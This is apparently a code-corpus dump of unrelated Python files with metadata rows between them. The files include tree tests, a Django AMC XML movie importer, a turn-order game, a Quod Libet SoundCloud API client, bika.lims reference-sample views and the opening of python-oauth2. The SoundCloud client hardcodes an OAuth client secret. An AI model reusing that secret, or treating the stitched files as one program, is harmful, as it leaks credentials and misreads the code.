tree1 = treecls(root)
base_id = 0
check_idempotence(tree1)
assert len(tree1.nodes) == N
assert tree1.node_types == ['Tst1',]
assert sorted(tree1.id_dict.keys()) == list(range(base_id,base_id + N))
assert list(tree1.type_dict.keys()) == ['Tst1']
assert sorted(tree1.type_dict['Tst1'], key=attrgetter('_id')) == \
sorted(tree1.nodes, key=attrgetter('_id'))
accum = []
def collect(node):
accum.append(node.value)
tree1.depth_first(collect)
assert sum(accum) == sum(range(1, N+1))
while tree1.root._children:
tree1.remove_node(tree1.root._children[0])
assert tree1.nodes == [tree1.root]
assert tree1.root._children == []
mod = 4
base_id = 0
sproot = tree_node_from_nested_list_types(lst[0], lst[1], mod)
tree2 = Tree(sproot)
assert len(tree2.nodes) == N
assert tree2.node_types == ['Tst1', 'Tst2']
assert sorted(tree2.id_dict.keys()) == list(range(base_id,base_id+N))
assert sorted(tree2.type_dict.keys()) == sorted(['Tst1', 'Tst2'])
assert sorted(tree2.type_dict['Tst1'] +
tree2.type_dict['Tst2'], key=attrgetter('_id')) == \
sorted(tree2.nodes, key=attrgetter('_id'))
accum = []
tree2.depth_first(collect)
assert sum(accum) == sum(range(1, N+1))
accum = []
tree2.depth_first(Tst2 = collect)
if N % mod != 0:
assert sum(accum) == sum(range(mod, N, mod))
#-----------------------------------------------------------
# Tree
def test_tree():
# Test that inequal roots mean inequal Trees
n1 = Node()
n2 = Node(_id=2)
t1 = Tree(n1)
t2 = Tree(n2)
assert n1 != n2
assert t1 != t2
t3 = Tree()
t3.validate()
assert t3 == t1
# In-depth tree tests
tree_tst_1(Tree) # basic tree operations
tree_tst_2(Tree) # test with a moderate/large number of nodes
# Miscellaneous tests
assert identity(5) == 5
n3 = Node(_id = 3)
t2.add_node(n3, parent=n2)
n3._parent = None
assert_raises(TreeError, t2.remove_node, n3)
assert_raises(TreeError, t2.replace_node, n3, n1)
#-------------------------------------------------------------------------------
# Test root node validation
rnv_accum = []
class Root1(Node):
def validate(self):
super(Root1, self).validate()
rnv_accum.append(1)
class RNVTree(Tree):
_attrs = dict(root = Attr(Root1))
def test_root_validation():
RNVTree(Root1())
assert sum(rnv_accum) == len(rnv_accum) == 1 # just a sanity check
#-------------------------------------------------------------------------------
if __name__ == '__main__': # pragma: no cover
from syn.base_utils import run_all_tests
run_all_tests(globals(), verbose=True, print_errors=False)
|
mit
| 5,143,387,071,253,162,000
| 27.770548
| 80
| 0.562195
| false
| 2.950825
| true
| false
| false
|
buzz/flicks
|
flicksapp/management/commands/import_amc_xml.py
|
1
|
6230
|
from datetime import datetime
import re
import elementtree.ElementTree as et
from django.core.management.base import BaseCommand
from flicksapp.models import Movie, Country, Person, Genre, File
imdb_regex = re.compile("http://.*imdb.com/title/tt0*(\d+)")
imdb_regex2 = re.compile("http://.*imdb.com/Title\?0*(\d+)")
def parse_imdb(f):
"""Parse imdb number out of imdb url. Skip field if not possible."""
global imdb_regex, imdb_regex2
r = imdb_regex.match(f)
try:
return int(r.groups()[0])
except AttributeError:
r = imdb_regex2.match(f)
return int(r.groups()[0])
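# e.g. parse_imdb("http://www.imdb.com/title/tt0068646/") -> 68646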
class Command(BaseCommand):
args = '<FILE>'
help = 'Imports AMC XML file'
def handle(self, *args, **options):
# load xml file
try:
xml_doc = et.parse(args[0])
except IndexError:
self.stdout.write('No file given\n')
return
except IOError:
self.stdout.write("Could not open file: %s" % args[0])
return
# add movies
movies = xml_doc.findall("//Movie")
for i, movie in enumerate(movies):
a = movie.attrib
# keep track of imported fields
fields = {}
new_movie = Movie()
try:
new_movie.id = int(a["Number"])
new_movie.title = a["OriginalTitle"].strip()
except KeyError:
self.stdout.write(
"Panic! Could not extract Number nor OriginalTitle." +
"Skipping title: %s\n" % a)
continue
new_movie.save() # or relations cannot be assigned
# if we can extract imdb id we leave most other fields
# empty that can be filled by imdb
            url = a.get("URL", "")
            try:
                new_movie.imdb_id = parse_imdb(url)
                fields['imdb_id'] = True
            except (KeyError, AttributeError):
                # if imdb id is not present we need to copy other
                # fields; the URL is fetched up front so it is always
                # bound here
                fields['imdb_id'] = False
if url and len(url) > 2:
new_movie.notes = "URL: %s\n" % url.strip()
fields['notes'] = True
# director
try:
director_name = a["Director"].strip()
try:
p = Person.objects.get(name=director_name)
except Person.DoesNotExist:
# ok we have to fill imdb person ourselves in some cases
if director_name == 'David Lynch':
imdb_id = 186
elif director_name == 'Carsten Walter':
imdb_id = None
elif director_name == 'Roger Sommer':
imdb_id = None
elif director_name == 'Dieter Rhode':
imdb_id = None
else:
raise Exception(
"Panic! Manually assign imdb id for person " +
"'%s' (%s)\n" %
(director_name, new_movie.title))
p = Person(imdb_id=imdb_id, name=director_name)
p.save()
new_movie.directors.add(p)
fields['directors'] = True
except KeyError:
fields['directors'] = False
# country
try:
country_name = a["Country"].strip()
c, created = Country.objects.get_or_create(
name=country_name)
c.save()
new_movie.countries.add(c)
fields['countries'] = True
except KeyError:
fields['countries'] = False
# category
try:
genre_name = a["Category"].strip()
g, created = Genre.objects.get_or_create(
name=genre_name)
g.save()
new_movie.genres.add(g)
fields['genres'] = True
except KeyError:
fields['genres'] = False
# year
try:
new_movie.year = int(a["Year"].strip())
fields['year'] = True
except (KeyError, ValueError):
fields['year'] = False
# runtime
try:
new_movie.runtime = int(a["Length"].strip())
fields['runtime'] = True
except (KeyError, ValueError):
fields['runtime'] = False
# plot (description)
try:
new_movie.plot = a["Description"].strip()
fields['plot'] = True
except (KeyError, ValueError):
fields['plot'] = False
# always import non-imdb fields
# seen (checked)
try:
checked = a["Checked"]
if checked == 'True':
seen = True
elif checked == 'False':
seen = False
else:
raise ValueError()
new_movie.seen = seen
fields['seen'] = True
except (KeyError, ValueError):
fields['seen'] = False
# date added
try:
new_movie.added_on = datetime.strptime(a["Date"], '%m/%d/%Y')
fields['added_on'] = True
except (KeyError, ValueError):
fields['added_on'] = False
# finally save movie
new_movie.save()
# log import
imported = ' '.join([f for f in fields.keys() if fields[f]])
not_imported = ' '.join(
[('-%s' % f) for f in fields.keys() if not fields[f]])
self.stdout.write(
"Imported '%s' (%s %s)\n" %
(new_movie.title, imported, not_imported))
|
gpl-2.0
| 6,874,207,777,880,569,000
| 37.9375
| 80
| 0.440931
| false
| 4.803392
| false
| false
| false
|
telerainbow/randgame
|
randgame.py
|
1
|
3031
|
import random, cmd, sys
class randgame(cmd.Cmd):
intro = "this is randgame"
prompt = "randgame # "
players = ["asdf", "foo"]
turn = 0
rounds = 0
active = False
    settings = {"no_two" : 0, "voice" : 0}
    last_player = None
def do_f(self, arg):
print self.last_player
def do_set(self, arg):
'set settings. see \"list settings\" for available options'
if arg == "" or len(arg.split()) != 2:
print "*** syntax: set <key> <value>, where value may be 0 or 1"
return
setting, value = arg.split()
if setting not in self.settings.keys():
print '*** unrecognized setting. available settings: {0}'.format(", ".join(self.settings.keys()))
return
if value not in ['0', '1']:
print "*** value must be 0 or 1"
return
self.settings[setting] = int(value)
def do_start(self, arg):
'starts the game'
if self.active == False:
print "Game Started! glhf"
self.active = True
self.shuffle()
self.do_next(1)
else:
print "*** Game already started! use \"next\" instead"
def do_next(self, arg):
'shows next player'
if self.active == False :
print "*** No active game, use \"start\" first"
return
print "#"*50
print
print "{0} Player is {1}".format(("First" if arg==1 else "Next"), self.players[self.turn])
print
print "#"*50
self.turn += 1
if self.turn == len(self.players):
self.turn = 0
self.shuffle()
self.rounds += 1
def do_end(self, arg):
'ends current game (but does not exit)'
if self.active != True:
print "*** no active game!"
return
self.turn = 0
self.active = False
print "game ended after {0} rounds!".format(self.rounds)
self.rounds = 0
    def shuffle(self):
        # remember who went last so do_f can report it
        self.last_player = self.players[-1]
        if self.settings["no_two"] == 0 :
            random.shuffle(self.players)
        else:
            # "no_two" keeps the same player from going twice in a row:
            # the previous last player is re-inserted anywhere but first
            last_player = self.players.pop()
            random.shuffle(self.players)
            self.players.insert( random.randint(1,len(self.players)), last_player)
def do_addplayer(self, arg):
'add a player to the game'
if self.active == True:
print "*** can't add player during active game"
return
if arg != "":
if arg not in self.players:
self.players.append(arg)
else:
print "*** player already added, please specify a different name"
else:
print "*** please specify a name"
def do_remove(self, arg):
'remove a player from the game'
if self.active == True:
print "*** can't remove player during game"
return
try:
self.players.remove(arg)
print "removed player {0} from game".format(arg)
except ValueError:
print "*** player not in game (check spelling?)"
def do_list(self, arg):
'list settings or list players'
if arg == "settings":
print "settings: "
for key in self.settings:
print "\t{0}\t{1}".format(key, self.settings[key])
elif arg == "players":
print ", ".join(map(str, self.players))
else:
print "*** \"list settings\" or \"list players\""
def do_q(self, arg):
'exit the program'
return True
def do_exit(self, arg):
'exit the program'
return True
if __name__ == '__main__':
randgame().cmdloop()
|
gpl-2.0
| 6,003,976,552,822,596,000
| 23.642276
| 100
| 0.626196
| false
| 3.003964
| false
| false
| false
|
Meriipu/quodlibet
|
quodlibet/browsers/soundcloud/api.py
|
1
|
10780
|
# Copyright 2016 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
from datetime import datetime
from urllib.parse import urlencode
from gi.repository import GObject, Gio, Soup
from quodlibet import util, config
from quodlibet.util import website
from quodlibet.util.dprint import print_w, print_d
from quodlibet.util.http import download_json, download
from .library import SoundcloudFile
from .util import json_callback, Wrapper, sanitise_tag, DEFAULT_BITRATE, EPOCH
class RestApi(GObject.Object):
"""Semi-generic REST API client, using libsoup / `http.py`"""
def __init__(self, root):
super().__init__()
self._cancellable = Gio.Cancellable.new()
self.root = root
def _default_params(self):
return {}
def _get(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('GET', self._url(path, args))
download_json(msg, self._cancellable, callback, None)
def _post(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('POST', self._url(path))
post_body = urlencode(args)
if not isinstance(post_body, bytes):
post_body = post_body.encode("ascii")
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, post_body)
download_json(msg, self._cancellable, callback, None)
def _put(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('PUT', self._url(path))
body = urlencode(args)
if not isinstance(body, bytes):
body = body.encode("ascii")
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, body)
download_json(msg, self._cancellable, callback, None)
def _delete(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
# Turns out the SC API doesn't mind body arguments for DELETEs,
# and as it's neater and slightly more secure, let's do that.
body = urlencode(args)
if not isinstance(body, bytes):
body = body.encode("ascii")
msg = Soup.Message.new('DELETE', self._url(path))
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, body)
download(msg, self._cancellable, callback, None, try_decode=True)
def _url(self, path, args=None):
path = "%s%s" % (self.root, path)
return "%s?%s" % (path, urlencode(args)) if args else path
class SoundcloudApiClient(RestApi):
__CLIENT_SECRET = 'ca2b69301bd1f73985a9b47224a2a239'
__CLIENT_ID = '5acc74891941cfc73ec8ee2504be6617'
API_ROOT = "https://api.soundcloud.com"
REDIRECT_URI = 'https://quodlibet.github.io/callbacks/soundcloud.html'
PAGE_SIZE = 150
MIN_DURATION_SECS = 120
COUNT_TAGS = {'%s_count' % t
for t in ('playback', 'download', 'likes', 'favoritings',
'download', 'comments')}
__gsignals__ = {
'fetch-success': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'fetch-failure': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'songs-received': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'comments-received': (GObject.SignalFlags.RUN_LAST, None,
(int, object,)),
'authenticated': (GObject.SignalFlags.RUN_LAST, None, (object,)),
}
def __init__(self):
print_d("Starting Soundcloud API...")
super().__init__(self.API_ROOT)
self.access_token = config.get("browsers", "soundcloud_token", None)
self.online = bool(self.access_token)
self.user_id = config.get("browsers", "soundcloud_user_id", None)
if not self.user_id:
self._get_me()
self.username = None
def _default_params(self):
params = {'client_id': self.__CLIENT_ID}
if self.access_token:
params["oauth_token"] = self.access_token
return params
def authenticate_user(self):
# create client object with app credentials
if self.access_token:
print_d("Ignoring saved Soundcloud token...")
# redirect user to authorize URL
website(self._authorize_url)
def log_out(self):
print_d("Destroying access token...")
self.access_token = None
self.save_auth()
self.online = False
def get_token(self, code):
print_d("Getting access token...")
options = {
'grant_type': 'authorization_code',
'redirect_uri': self.REDIRECT_URI,
'client_id': self.__CLIENT_ID,
'client_secret': self.__CLIENT_SECRET,
'code': code,
}
self._post('/oauth2/token', self._receive_token, **options)
@json_callback
def _receive_token(self, json):
self.access_token = json['access_token']
print_d("Got an access token: %s" % self.access_token)
self.save_auth()
self.online = True
self._get_me()
def _get_me(self):
self._get('/me', self._receive_me)
@json_callback
def _receive_me(self, json):
self.username = json['username']
self.user_id = json['id']
self.emit('authenticated', Wrapper(json))
def get_tracks(self, params):
merged = {
"q": "",
"limit": self.PAGE_SIZE,
"duration[from]": self.MIN_DURATION_SECS * 1000,
}
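        # free-text search terms are space-joined into the single "q"
        # parameter; every other filter is sent as a comma-separated list
        # (our reading of the delimiter choice below)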
for k, v in params.items():
delim = " " if k == 'q' else ","
merged[k] = delim.join(list(v))
print_d("Getting tracks: params=%s" % merged)
self._get('/tracks', self._on_track_data, **merged)
@json_callback
def _on_track_data(self, json):
songs = list(filter(None, [self._audiofile_for(r) for r in json]))
self.emit('songs-received', songs)
def get_favorites(self):
self._get('/me/favorites', self._on_track_data, limit=self.PAGE_SIZE)
def get_my_tracks(self):
self._get('/me/tracks', self._on_track_data, limit=self.PAGE_SIZE)
def get_comments(self, track_id):
self._get('/tracks/%s/comments' % track_id, self._receive_comments,
limit=200)
@json_callback
def _receive_comments(self, json):
print_d("Got comments: %s" % json)
if json and len(json):
# Should all be the same track...
track_id = json[0]["track_id"]
self.emit('comments-received', track_id, json)
def save_auth(self):
config.set("browsers", "soundcloud_token", self.access_token or "")
config.set("browsers", "soundcloud_user_id", self.user_id or "")
def put_favorite(self, track_id):
print_d("Saving track %s as favorite" % track_id)
url = '/me/favorites/%s' % track_id
self._put(url, self._on_favorited)
def remove_favorite(self, track_id):
print_d("Deleting favorite for %s" % track_id)
url = '/me/favorites/%s' % track_id
self._delete(url, self._on_favorited)
@json_callback
def _on_favorited(self, json):
print_d("Successfully updated favorite: %s" % json)
def _audiofile_for(self, response):
r = Wrapper(response)
d = r.data
dl = d.get("downloadable", False) and d.get("download_url", None)
try:
url = dl or r.stream_url
except AttributeError as e:
print_w("Unusable result (%s) from SC: %s" % (e, d))
return None
uri = SoundcloudApiClient._add_secret(url)
song = SoundcloudFile(uri=uri,
track_id=r.id,
favorite=d.get("user_favorite", False),
client=self)
def get_utc_date(s):
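            # SoundCloud dates look like "2013/03/24 00:32:01 +0000"; the
            # trailing UTC-offset token is dropped before parsing
            # (assumption inferred from the format string below)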
parts = s.split()
dt = datetime.strptime(" ".join(parts[:-1]), "%Y/%m/%d %H:%M:%S")
return int((dt - EPOCH).total_seconds())
def put_time(tag, r, attr):
try:
song[tag] = get_utc_date(r[attr])
except KeyError:
pass
def put_date(tag, r, attr):
try:
parts = r[attr].split()
dt = datetime.strptime(" ".join(parts[:-1]),
"%Y/%m/%d %H:%M:%S")
song[tag] = dt.strftime("%Y-%m-%d")
except KeyError:
pass
def put_counts(tags):
for tag in tags:
try:
song["~#%s" % tag] = int(r[tag])
except KeyError:
pass
try:
song.update(title=r.title,
artist=r.user["username"],
soundcloud_user_id=str(r.user_id),
website=r.permalink_url,
genre=u"\n".join(r.genre and r.genre.split(",") or []))
if dl:
song.update(format=r.original_format)
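                # original_content_size is in bytes and duration in ms,
                # so bytes*8/ms works out to kbit/s (cf. ~#length below)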
song["~#bitrate"] = r.original_content_size * 8 / r.duration
else:
song["~#bitrate"] = DEFAULT_BITRATE
if r.description:
song["comment"] = sanitise_tag(r.description)
song["~#length"] = int(r.duration) / 1000
art_url = r.artwork_url
if art_url:
song["artwork_url"] = (
art_url.replace("-large.", "-t500x500."))
put_time("~#mtime", r, "last_modified")
put_date("date", r, "created_at")
put_counts(self.COUNT_TAGS)
plays = d.get("user_playback_count", 0)
if plays:
song["~#playcount"] = plays
# print_d("Got song: %s" % song)
except Exception as e:
print_w("Couldn't parse a song from %s (%r). "
"Had these tags:\n %s" % (r, e, song.keys()))
return song
@classmethod
def _add_secret(cls, stream_url):
return "%s?client_id=%s" % (stream_url, cls.__CLIENT_ID)
@util.cached_property
def _authorize_url(self):
url = '%s/connect' % (self.API_ROOT,)
options = {
'scope': 'non-expiring',
'client_id': self.__CLIENT_ID,
'response_type': 'code',
'redirect_uri': self.REDIRECT_URI
}
return '%s?%s' % (url, urlencode(options))
|
gpl-2.0
| -444,583,630,564,009,100
| 35.542373
| 79
| 0.552041
| false
| 3.672913
| false
| false
| false
|
rockfruit/bika.lims
|
bika/lims/browser/referencesample.py
|
1
|
17439
|
# This file is part of Bika LIMS
#
# Copyright 2011-2016 by it's authors.
# Some rights reserved. See LICENSE.txt, AUTHORS.txt.
from AccessControl import getSecurityManager
from bika.lims.browser import BrowserView
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.browser.bika_listing import BikaListingView
from bika.lims.utils import isActive
from bika.lims.browser.analyses import AnalysesView
from datetime import datetime
from operator import itemgetter
from plone.app.layout.globals.interfaces import IViewView
from Products.Archetypes.config import REFERENCE_CATALOG
from Products.ATContentTypes.utils import DT2dt
from Products.CMFCore.utils import getToolByName
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from zope.component import getMultiAdapter
from zope.interface import implements
import json, plone
class ViewView(BrowserView):
""" Reference Sample View
"""
implements(IViewView)
template = ViewPageTemplateFile("templates/referencesample_view.pt")
def __init__(self, context, request):
BrowserView.__init__(self, context, request)
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
def __call__(self):
rc = getToolByName(self.context, REFERENCE_CATALOG)
self.results = {} # {category_title: listofdicts}
for r in self.context.getReferenceResults():
service = rc.lookupObject(r['uid'])
cat = service.getCategoryTitle()
if cat not in self.results:
self.results[cat] = []
r['service'] = service
self.results[cat].append(r)
self.categories = self.results.keys()
self.categories.sort()
return self.template()
class ReferenceAnalysesViewView(BrowserView):
""" View of Reference Analyses linked to the Reference Sample.
"""
implements(IViewView)
template = ViewPageTemplateFile("templates/referencesample_analyses.pt")
def __init__(self, context, request):
super(ReferenceAnalysesViewView, self).__init__(context, request)
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
self.title = self.context.translate(_("Reference Analyses"))
self.description = ""
self._analysesview = None
def __call__(self):
return self.template()
def get_analyses_table(self):
""" Returns the table of Reference Analyses
"""
return self.get_analyses_view().contents_table()
def get_analyses_view(self):
if not self._analysesview:
# Creates the Analyses View if not exists yet
self._analysesview = ReferenceAnalysesView(self.context,
self.request)
self._analysesview.allow_edit = False
self._analysesview.show_select_column = False
self._analysesview.show_workflow_action_buttons = False
self._analysesview.form_id = "%s_qcanalyses" % self.context.UID()
self._analysesview.review_states[0]['transitions'] = [{}]
return self._analysesview
def getReferenceSampleId(self):
        return self.context.id
def get_analyses_json(self):
return self.get_analyses_view().get_analyses_json()
class ReferenceAnalysesView(AnalysesView):
""" Reference Analyses on this sample
"""
implements(IViewView)
def __init__(self, context, request):
AnalysesView.__init__(self, context, request)
self.catalog = 'bika_analysis_catalog'
self.contentFilter = {'portal_type':'ReferenceAnalysis',
'path': {'query':"/".join(self.context.getPhysicalPath()),
'level':0}}
self.show_select_row = False
self.show_sort_column = False
self.show_select_column = False
self.allow_edit = False
self.columns = {
'id': {'title': _('ID'), 'toggle':False},
'getReferenceAnalysesGroupID': {'title': _('QC Sample ID'), 'toggle': True},
'Category': {'title': _('Category'), 'toggle': True},
'Service': {'title': _('Service'), 'toggle':True},
'Worksheet': {'title': _('Worksheet'), 'toggle':True},
'Method': {
'title': _('Method'),
'sortable': False,
'toggle': True},
'Instrument': {
'title': _('Instrument'),
'sortable': False,
'toggle': True},
'Result': {'title': _('Result'), 'toggle':True},
'Captured': {'title': _('Captured'), 'toggle':True},
'Uncertainty': {'title': _('+-'), 'toggle':True},
'DueDate': {'title': _('Due Date'),
'index': 'getDueDate',
'toggle':True},
'retested': {'title': _('Retested'), 'type':'boolean', 'toggle':True},
'state_title': {'title': _('State'), 'toggle':True},
}
self.review_states = [
{'id':'default',
'title': _('All'),
'contentFilter':{},
'transitions': [],
'columns':['id',
'getReferenceAnalysesGroupID',
'Category',
'Service',
'Worksheet',
'Method',
'Instrument',
'Result',
'Captured',
'Uncertainty',
'DueDate',
'state_title'],
},
]
self.anjson = {}
def isItemAllowed(self, obj):
allowed = super(ReferenceAnalysesView, self).isItemAllowed(obj)
return allowed if not allowed else obj.getResult() != ''
def folderitem(self, obj, item, index):
item = super(ReferenceAnalysesView, self).folderitem(obj, item, index)
if not item:
return None
service = obj.getService()
item['Category'] = service.getCategoryTitle()
item['Service'] = service.Title()
item['Captured'] = self.ulocalized_time(obj.getResultCaptureDate())
brefs = obj.getBackReferences("WorksheetAnalysis")
item['Worksheet'] = brefs and brefs[0].Title() or ''
# The following item keywords are required for the
# JSON return value below, which is used to render graphs.
# they are not actually used in the table rendering.
item['Keyword'] = service.getKeyword()
item['Unit'] = service.getUnit()
self.addToJSON(obj, service, item)
return item
def addToJSON(self, analysis, service, item):
""" Adds an analysis item to the self.anjson dict that will be used
after the page is rendered to generate a QC Chart
"""
parent = analysis.aq_parent
qcid = parent.id
serviceref = "%s (%s)" % (item['Service'], item['Keyword'])
trows = self.anjson.get(serviceref, {})
anrows = trows.get(qcid, [])
anid = '%s.%s' % (item['getReferenceAnalysesGroupID'], item['id'])
rr = parent.getResultsRangeDict()
uid = service.UID()
if uid in rr:
specs = rr.get(uid, None)
smin = float(specs.get('min', 0))
smax = float(specs.get('max', 0))
error = float(specs.get('error', 0))
target = float(specs.get('result', 0))
result = float(item['Result'])
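            # widen the allowed range by the % error taken relative to
            # the target value (our reading of the fields above)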
error_amount = ((target / 100) * error) if target > 0 else 0
upper = smax + error_amount
lower = smin - error_amount
anrow = {'date': item['Captured'],
'min': smin,
'max': smax,
'target': target,
'error': error,
'erroramount': error_amount,
'upper': upper,
'lower': lower,
'result': result,
'unit': item['Unit'],
'id': item['uid']}
anrows.append(anrow)
trows[qcid] = anrows
self.anjson[serviceref] = trows
def get_analyses_json(self):
return json.dumps(self.anjson)
class ReferenceResultsView(BikaListingView):
"""
"""
def __init__(self, context, request):
super(ReferenceResultsView, self).__init__(context, request)
bsc = getToolByName(context, 'bika_setup_catalog')
self.title = self.context.translate(_("Reference Values"))
self.description = self.context.translate(_(
"Click on Analysis Categories (against shaded background) "
"to see Analysis Services in each category. Enter minimum "
"and maximum values to indicate a valid results range. "
"Any result outside this range will raise an alert. "
"The % Error field allows for an % uncertainty to be "
"considered when evaluating results against minimum and "
"maximum values. A result out of range but still in range "
"if the % error is taken into consideration, will raise a "
"less severe alert."))
self.contentFilter = {}
self.context_actions = {}
self.show_sort_column = False
self.show_select_row = False
self.show_workflow_action_buttons = False
self.show_select_column = False
self.pagesize = 999999
self.columns = {
'Service': {'title': _('Service')},
'result': {'title': _('Result')},
'min': {'title': _('Min')},
'max': {'title': _('Max')},
}
self.review_states = [
{'id':'default',
'title': _('All'),
'contentFilter':{},
'columns': ['Service',
'result',
'min',
'max']},
]
def folderitems(self):
items = []
uc = getToolByName(self.context, 'uid_catalog')
# not using <self.contentsMethod=bsc>
for x in self.context.getReferenceResults():
service = uc(UID=x['uid'])[0].getObject()
item = {
'obj': self.context,
'id': x['uid'],
'uid': x['uid'],
'result': x['result'],
'min': x['min'],
'max': x['max'],
'title': service.Title(),
'Service': service.Title(),
'type_class': 'contenttype-ReferenceResult',
'url': service.absolute_url(),
'relative_url': service.absolute_url(),
'view_url': self.context.absolute_url() + "/results",
'replace': {},
'before': {},
'after': {},
'choices':{},
'class': {},
'state_class': 'state-active',
'allow_edit': [],
}
item['replace']['Service'] = "<a href='%s'>%s</a>" % \
(service.absolute_url(), service.Title())
items.append(item)
items = sorted(items, key = itemgetter('Service'))
return items
class ReferenceSamplesView(BikaListingView):
"""Main reference samples folder view
"""
def __init__(self, context, request):
super(ReferenceSamplesView, self).__init__(context, request)
portal = getToolByName(context, 'portal_url').getPortalObject()
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
self.title = self.context.translate(_("Reference Samples"))
self.catalog = 'bika_catalog'
self.contentFilter = {'portal_type': 'ReferenceSample',
'sort_on':'id',
'sort_order': 'reverse',
'path':{"query": ["/"], "level" : 0 }, }
self.context_actions = {}
self.show_select_column = True
request.set('disable_border', 1)
self.columns = {
'ID': {
'title': _('ID'),
'index': 'id'},
'Title': {
'title': _('Title'),
'index': 'sortable_title',
'toggle':True},
'Supplier': {
'title': _('Supplier'),
'toggle':True,
'attr': 'aq_parent.Title',
'replace_url': 'aq_parent.absolute_url'},
'Manufacturer': {
'title': _('Manufacturer'),
'toggle': True,
'attr': 'getManufacturer.Title',
'replace_url': 'getManufacturer.absolute_url'},
'Definition': {
'title': _('Reference Definition'),
'toggle':True,
'attr': 'getReferenceDefinition.Title',
'replace_url': 'getReferenceDefinition.absolute_url'},
'DateSampled': {
'title': _('Date Sampled'),
'index': 'getDateSampled',
'toggle':True},
'DateReceived': {
'title': _('Date Received'),
'index': 'getDateReceived',
'toggle':True},
'DateOpened': {
'title': _('Date Opened'),
'toggle':True},
'ExpiryDate': {
'title': _('Expiry Date'),
'index': 'getExpiryDate',
'toggle':True},
'state_title': {
'title': _('State'),
'toggle':True},
}
self.review_states = [
{'id':'default',
'title': _('Current'),
'contentFilter':{'review_state':'current'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'expired',
'title': _('Expired'),
'contentFilter':{'review_state':'expired'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'disposed',
'title': _('Disposed'),
'contentFilter':{'review_state':'disposed'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'all',
'title': _('All'),
'contentFilter':{},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate',
'state_title']},
]
def folderitem(self, obj, item, index):
workflow = getToolByName(obj, 'portal_workflow')
if item.get('review_state', 'current') == 'current':
# Check expiry date
exdate = obj.getExpiryDate()
if exdate:
expirydate = DT2dt(exdate).replace(tzinfo=None)
if (datetime.today() > expirydate):
# Trigger expiration
workflow.doActionFor(obj, 'expire')
item['review_state'] = 'expired'
item['obj'] = obj
if self.contentFilter.get('review_state', '') \
and item.get('review_state', '') == 'expired':
# This item must be omitted from the list
return None
item['ID'] = obj.id
item['DateSampled'] = self.ulocalized_time(obj.getDateSampled(), long_format=True)
item['DateReceived'] = self.ulocalized_time(obj.getDateReceived())
item['DateOpened'] = self.ulocalized_time(obj.getDateOpened())
item['ExpiryDate'] = self.ulocalized_time(obj.getExpiryDate())
after_icons = ''
if obj.getBlank():
after_icons += "<img\
src='%s/++resource++bika.lims.images/blank.png' \
title='%s'>" % (self.portal_url, t(_('Blank')))
if obj.getHazardous():
after_icons += "<img\
src='%s/++resource++bika.lims.images/hazardous.png' \
title='%s'>" % (self.portal_url, t(_('Hazardous')))
item['replace']['ID'] = "<a href='%s/base_view'>%s</a> %s" % \
(item['url'], item['ID'], after_icons)
return item
|
agpl-3.0
| 343,148,943,437,828,700
| 39.089655
| 93
| 0.495843
| false
| 4.462385
| false
| false
| false
|
predatell/python-oauth2
|
oauth2/__init__.py
|
1
|
29176
|
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
